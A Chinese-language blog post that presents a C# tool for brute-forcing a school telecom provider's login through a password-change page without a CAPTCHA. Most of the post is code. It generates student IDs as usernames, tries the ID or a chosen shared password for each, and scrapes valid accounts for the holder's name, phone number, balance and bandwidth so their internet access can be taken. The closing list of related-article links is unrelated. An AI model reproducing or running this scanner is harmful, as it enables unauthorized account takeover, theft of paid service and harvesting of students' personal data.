最近发现我们学校的电信上网改密码的页面很简单,没有验证码,于是我就很好奇,后来发现原来是我们学校的电信的那个改密码的页面有漏洞于是就可以通过扫描账号免费上网

原理就是对修改密码的页面进行POST请求

如果密码账号正确就返回200

下面是C#的网络操作类

using System;

using System.IO;

using System.Net;

using System.Text;

using System.Collections.Generic;

using System.Text.RegularExpressions;

namespace scan

{

    public class zzHttp

    {

        private const string sContentType = "application/x-www-form-urlencoded";

        private const string sUserAgent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";

        public static string Send(string data, string url)

        {

            return Send(Encoding.GetEncoding("UTF-8").GetBytes(data), url);

        }

        public static string Send(byte[] data, string url)

        {

            Stream responseStream;

            HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest;

            if (request == null)

            {

                throw new ApplicationException(string.Format("Invalid url string: {0}", url));

            }

            // request.UserAgent = sUserAgent;

            request.ContentType = sContentType;

            request.Method = "POST";

            request.ContentLength = data.Length;

            Stream requestStream = request.GetRequestStream();

            requestStream.Write(data, 0, data.Length);

            requestStream.Close();

            try

            {

                responseStream = request.GetResponse().GetResponseStream();

            }

            catch (Exception exception)

            {

                throw exception;

            }

            string str = string.Empty;

            using (StreamReader reader = new StreamReader(responseStream, Encoding.GetEncoding("UTF-8")))

            {

                str = reader.ReadToEnd();

            }

            responseStream.Close();

            return str;

        }

        #region 同步通过POST方式发送数据

        /// <summary>

        /// 通过POST方式发送数据

        /// </summary>

        /// <param name="Url">url</param>

        /// <param name="postDataStr">Post数据</param>

        /// <param name="cookie">Cookie容器</param>

        /// <returns></returns>

        public string SendDataByPost(string Url, string postDataStr, ref CookieContainer cookie)

        {

            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Url);

            if (cookie.Count == 0)

            {

                request.CookieContainer = new CookieContainer();

                cookie = request.CookieContainer;

            }

            else

            {

                request.CookieContainer = cookie;

            }

            request.Method = "POST";

            request.ContentType = "application/x-www-form-urlencoded";

            request.ContentLength = postDataStr.Length;

            //request.Timeout = 1000;

            //request.ReadWriteTimeout = 3000;

            Stream myRequestStream = request.GetRequestStream();

            StreamWriter myStreamWriter = new StreamWriter(myRequestStream, Encoding.GetEncoding("gb2312"));

            myStreamWriter.Write(postDataStr);

            myStreamWriter.Close();

            HttpWebResponse response = (HttpWebResponse)request.GetResponse();

            Stream myResponseStream = response.GetResponseStream();

            StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding("gb2312"));

            string retString = myStreamReader.ReadToEnd();

            myStreamReader.Close();

            myResponseStream.Close();

            return retString;

        }

        #endregion

        #region 同步通过GET方式发送数据

        /// <summary>

        /// 通过GET方式发送数据

        /// </summary>

        /// <param name="Url">url</param>

        /// <param name="postDataStr">GET数据</param>

        /// <param name="cookie">Cookie容器</param>

        /// <returns></returns>

        public string SendDataByGET(string Url, string postDataStr, ref CookieContainer cookie)

        {

            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Url + (postDataStr == "" ? "" : "?") + postDataStr);

            if (cookie.Count == 0)

            {

                request.CookieContainer = new CookieContainer();

                cookie = request.CookieContainer;

            }

            else

            {

                request.CookieContainer = cookie;

            }

            request.Method = "GET";

            request.ContentType = "text/html;charset=UTF-8";

            HttpWebResponse response = (HttpWebResponse)request.GetResponse();

            Stream myResponseStream = response.GetResponseStream();

            StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding("utf-8"));

            string retString = myStreamReader.ReadToEnd();

            myStreamReader.Close();

            myResponseStream.Close();

            return retString;

        }

        #endregion

        public string zzget(string Url,string getdata, string type)

        {

            try

            {

                System.Net.WebRequest wReq = System.Net.WebRequest.Create(Url + (getdata == "" ? "" : "?") + getdata);

                // Get the response instance.

                wReq.Method = "GET";

                wReq.ContentType = "text/html;charset=UTF-8";

                System.Net.WebResponse wResp = wReq.GetResponse();

                System.IO.Stream respStream = wResp.GetResponseStream();

                // Dim reader As StreamReader = New StreamReader(respStream)

                using (System.IO.StreamReader reader = new System.IO.StreamReader(respStream, Encoding.GetEncoding(type)))

                {

                    return reader.ReadToEnd();

                }

            }

            catch (System.Exception ex)

            {

                //errorMsg = ex.Message;

            }

            return "";

        }

        ///<summary>

        ///采用post发送请求

        ///</summary>

        ///<param name="URL">url地址</param>

        ///<param name="strPostdata">发送的数据</param>

        ///<returns></returns>

        public string zzpost(string URL, IDictionary<string, Object> strPostdata, string strEncoding)

        {

            //IDictionary<string, Object> idc = new Dictionary<string, object>();

            StringBuilder data = new StringBuilder();

            foreach (KeyValuePair<string, Object> param in strPostdata)

            {

                data.Append(param.Key).Append("=");

                data.Append(param.Value.ToString());

                data.Append("&");

            }

            data.Remove(data.Length- 1,1);

            Encoding encoding = Encoding.Default;

            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(URL);

            request.CookieContainer = new CookieContainer();//少了这句就不能登录

            request.Method = "post";

            request.Accept = "text/html, application/xhtml+xml, */*";

            request.ContentType = "application/x-www-form-urlencoded";

            byte[] buffer = encoding.GetBytes(data.ToString());

            request.ContentLength = buffer.Length;

            request.GetRequestStream().Write(buffer, 0, buffer.Length);

            /*

            request.ContentLength = data.Length;

            Stream myRequestStream = request.GetRequestStream();

            StreamWriter myStreamWriter = new StreamWriter(myRequestStream, Encoding.GetEncoding("gb2312"));

            myStreamWriter.Write(data);

            myStreamWriter.Close();

            */

            HttpWebResponse response = (HttpWebResponse)request.GetResponse();

            using (StreamReader reader = new StreamReader(response.GetResponseStream(), System.Text.Encoding.GetEncoding(strEncoding)))

            {

                return reader.ReadToEnd();

            }

        }

        /// <summary>

        /// 清除文本中Html的标签

        /// </summary>

        /// <param name="Content"></param>

        /// <returns></returns>

        public static string ClearHtml(string Content)

        {

            Content = Zxj_ReplaceHtml("&#[^>]*;", "", Content);

            Content = Zxj_ReplaceHtml("</?marquee[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?object[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?param[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?embed[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?table[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml(" ", "", Content);

            Content = Zxj_ReplaceHtml("</?tr[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?th[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?p[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?a[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?img[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?tbody[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?li[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?span[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?div[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?th[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?td[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?script[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("(javascript|jscript|vbscript|vbs):", "", Content);

            Content = Zxj_ReplaceHtml("on(mouse|exit|error|click|key)", "", Content);

            Content = Zxj_ReplaceHtml("<\\?xml[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("<\\/?[a-z]+:[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?font[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?b[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?u[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?i[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?strong[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml("</?strong[^>]*>", "", Content);

            Content = Zxj_ReplaceHtml(" ", "", Content);

            Regex r = new Regex(@"\s+");

            Content = r.Replace(Content, "");

            Content.Trim();

            string clearHtml = Content;

            return clearHtml;

        }

        /// <summary>

        /// 清除文本中的Html标签

        /// </summary>

        /// <param name="patrn">要替换的标签正则表达式</param>

        /// <param name="strRep">替换为的内容</param>

        /// <param name="content">要替换的内容</param>

        /// <returns></returns>

        private static string Zxj_ReplaceHtml(string patrn, string strRep, string content)

        {

            if (string.IsNullOrEmpty(content))

            {

                content = "";

            }

            Regex rgEx = new Regex(patrn, RegexOptions.IgnoreCase);

            string strTxt = rgEx.Replace(content, strRep);

            return strTxt;

        }

    }

}

然后对某个网址进行post请求

 //开始扫描

        public void scan()

        {

            bool flag = false;

            object[] V= GetValue();

            string no = V[0].ToString();

            string userpass = V[1].ToString();

            int cnum = int.Parse(V[2].ToString());

            int snum = int.Parse(V[3].ToString());

            if (userpass.Length <= 0)

                flag = true;

            zzHttp http = new zzHttp();

            string url = "这儿填你需要的网址";

            //统计线程数

            ThreadPool.QueueUserWorkItem(new WaitCallback(CountProcess));

            //检查线程是否结束

            rhw = ThreadPool.RegisterWaitForSingleObject(new AutoResetEvent(false), this.CheckThreadPool, null, 1000, false);

            int begin = int.Parse(beginclass.Text);

            int end = int.Parse(endclass.Text);

            for (int m = begin; m <= end; m++)//扫描不同年级

            {

                for (int j = 1; j <= cnum; j++)

                {

                    string tmp = "";

                    if (j < 10)

                        tmp = m + no + "0" + j;

                    else

                        tmp = m + no + j;

                    for (int i = 1; i <= snum; i++)

                    {

                        string tempstuno = "";//构造出来的学号

                        if (i < 10)

                            tempstuno = tmp + "0" + i;

                        else

                            tempstuno = tmp + i;

                        AddAccountMessage( tempstuno + "<正在检查...>");

                        if (flag)

                        {

                            scanuser s = new scanuser(http, url, tempstuno, tempstuno, this);

                            // threadReceive = new Thread(new ThreadStart(s.login));

                            ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));

                        }

                        else

                        {

                            scanuser s = new scanuser(http, url, tempstuno, userpass, this);

                            //threadReceive = new Thread(new ThreadStart(s.login));

                            ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));

                        }

                        //threadReceive.Start();

                    }

                }

            }

        }

下面是扫描类

//扫描类

        class scanuser

        {

            public Form1 F = null;

            zzHttp http;

            string url;

            string username;

            string userpass;

            //判断一个用户的用户名和密码是否正确的

            public scanuser(zzHttp http, string url, string username, string userpass, Form1 F)

            {

                this.F = F;

                this.http = http;

                this.username = username;

                this.userpass = userpass;

                this.url = url;

            }

            //登录

            public void login(Object stateInfo)

            {

                string postdata = String.Format("name={0}&password={1}", username, userpass);

                CookieContainer cookie = new CookieContainer();

                try

                {

                    string ret = http.SendDataByPost(url, postdata, ref cookie);

                    if (ret.Contains("客户名称"))

                    {

                        ret = zzHttp.ClearHtml(ret);//去掉多余的html

                        //获取姓名

                        int pos = ret.LastIndexOf("客户名称");

                        string name = ret.Substring(pos + 5, 2);//两个字姓名

                        string tmp = ret.Substring(pos + 7, 1);//第三个字

                        if (tmp != "联")

                            name = name + tmp;

                        //获取手机号

                        pos = ret.LastIndexOf("联系电话");

                        string tel = ret.Substring(pos + 5, 11);

                        Regex regex = new Regex("^1\\d{10}$");

                        if (!regex.IsMatch(tel))

                            tel = "无";

                        //获取预存款

                        pos = ret.LastIndexOf("预存款余额(RMB)");

                        string money = ret.Substring(pos + 11,5);

                        tmp = ret.Substring(pos+16,1);

                        if (tmp != "<")

                            money += tmp;

                        //获取带宽 先判断有没有备注

                        string width = "2M";

                        if (ret.Contains("独享"))

                        {

                            if (ret.Contains("4M"))

                                width = "4M";

                            else if (ret.Contains("6M"))

                                width = "6M";

                            else if (ret.Contains("8M"))

                                width = "8M";

                            else if (ret.Contains("12M"))

                                width = "12M";

                        }

                        if (ret.Contains("有效"))

                        {

                            //F.AddScanMessage("\n");

                            F.Setcolor(Color.Green);

                            F.AddScanMessage(username + "<有效," + name + "," + tel + ",$=" + money + "," + width + ">");

                            write_txt(username,userpass,name,width);

                        }

                        else if (ret.Contains("停机"))

                        {

                            //F.AddScanMessage("\n");

                            F.Setcolor(Color.Red);

                            F.AddScanMessage(username + "<停机,"+ name + "," + tel + ">");

                        }

                    }

                }catch(Exception ex)

                {

                    F.Setcolor(Color.Yellow);

                    F.AddScanMessage("网络故障..."+ex.Message);

                }

            }

        }

c#实现对登陆信息的反馈,实现对网站登录密码的扫描的更多相关文章

  1. arcgismanager登陆信息不对

    arcgis版本:arcgis10 安装arcgis server后(java版的win764位系统),发现arcgis管理器登陆界面(http://localhost:8099/arcgismana ...

  2. [转]mvc3 使用session来存储类来存储用户登陆信息

    mvc3 使用session来存储类来存储用户登陆信息 2013-08-26 09:48:56|  分类: NET开发 |举报 |字号 订阅   项目之前的登陆机制是这样的:用户登陆后初始化一个类,类 ...

  3. java的web项目中使用cookie保存用户登陆信息

    本文转自:http://lever0066.iteye.com/blog/1735963 最近在编写论坛系统的实现,其中就涉及到用户登陆后保持会话直到浏览器关闭,同时可以使用cookie保存登陆信息以 ...

  4. linux 用户登陆信息查询

    1.查看命令历史 每个用户都有一份命令历史记录 查看$HOME/.bash_history 或者在终端输入: history 2.last命令 查看用户登录历史 此命令会读取 /var/log/wtm ...

  5. python 网页爬虫,带登陆信息

    注意点: 1. 用Fiddler抓取登陆后的headers,cookies; 2. 每抓取一次网页暂停一点时间防止反爬虫; 3. 抓取前,需要关闭Fiddler以防止端口占用. 还需解决的问题: 爬取 ...

  6. linux查看当前用户登陆信息

    @(Linux基础)[linux查看当前用户登陆信息] linux查看当前用户登陆信息 作为系统管理员,你可能经常会(在某个时候)需要查看系统中有哪些用户正在活动.有些时候,你甚至需要知道他(她)们正 ...

  7. 【转】修改Ubuntu系统的登陆信息的简单方法

    转自http://www.jb51.net/os/Ubuntu/414663.html Ubuntu的登陆和欢迎信息控制/etc/issue和/etc/motd/etc/issue与/etc/motd ...

  8. 利用websocket实现手机扫码登陆后,同步登陆信息到web端页面

    新手必看 广播系统 事件系统 准备工作 初始化项目 引入 laravel-websockets 软件包 启动 websocket 监听 主要流程 创建两个页面 建立 socket 连接 手机端扫码登陆 ...

  9. ubuntu修改登录信息(本机和SSH登录)

    1.需要修改的主要文件和目录如下:/etc/issue/etc/motd/etc/update-motd.d//etc/issue.net 2.Ubuntu的登陆和欢迎信息控制主要在/etc/issu ...

随机推荐

  1. oracle基于3种方法的大数据量插入更新

    过程插入更新的3种方法: a.逐条检查插入或更新,同时执行插入或更新 b.逐条merge into(逐条是为了记录过程日志与错误信息) c.基于关联数组的检查插入.更新,通过forall批量sql执行 ...

  2. [py][mx]django实现课程机构排名

    如果是第一次做这个玩意,说实话,确实不知道怎么弄, 做一次后就有感觉了 此前我们已经完成了: 分类筛选 分页 这次我们做的是 课程机构排名 知识点: - 按照点击数从大到小排名, 取出前三名 hot_ ...

  3. 跟我学Makefile(五)

    文件名操作函数 每个函数的参数字符串都会被当做一个或是一系列的文件名来对待. $(dir <names...>) 名称:取目录函数——dir. 功能:从文件名序列<names> ...

  4. C#检查文件是否被占用

    第一种方法: using System.IO; using System.Runtime.InteropServices; [DllImport("kernel32.dll")] ...

  5. 非线性方程(组):一维非线性方程(一)二分法、不动点迭代、牛顿法 [MATLAB]

    1. 二分法(Bisection) 1) 原理 [介值定理] 对于连续的一元非线性函数,若其在两个点的取值异号,则在两点间必定存在零点. [迭代流程] 若左右两端取值不同,则取其中点,求其函数值,取中 ...

  6. ng-深度学习-课程笔记-5: 深层神经网络(Week4)

    1 深度L层神经网络( Deep L-layer Neural network ) 针对具体问题很难判断需要几层的网络,所以先试试逻辑回归是比较合理的做法,然后再试试单隐层,把隐层数量当作一个超参数, ...

  7. flask应用中取得config的配置

    from flask import current_app config = current_app.config SITE_DOMAIN = config.get('SITE_DOMAIN')

  8. 为什么要用Zero-Copy机制?

    考虑这样一种常用的情形:你需要将静态内容(类似图片.文件)展示给用户.那么这个情形就意味着你需要先将静态内容从磁盘中拷贝出来放到一个内存buf中,然后将这个buf通过socket传输给用户,进而用户或 ...

  9. [one day one question] 部分ios版本 在display: inline-block时候不支持flex

    问题描述: 部分ios 在display: inline-block时候不支持flex,这怎么破? 解决方案: so easy,不要使用display: inline-block;就行啦 君生我未生, ...

  10. 使用 log4js UDP 发送数据到 logstash

    本文地址 http://www.cnblogs.com/jasonxuli/p/6532723.html 因为 nodejs 一般会部署在多台机器,并且每台机器会起多个进程,因此查看日志时往往要人工区 ...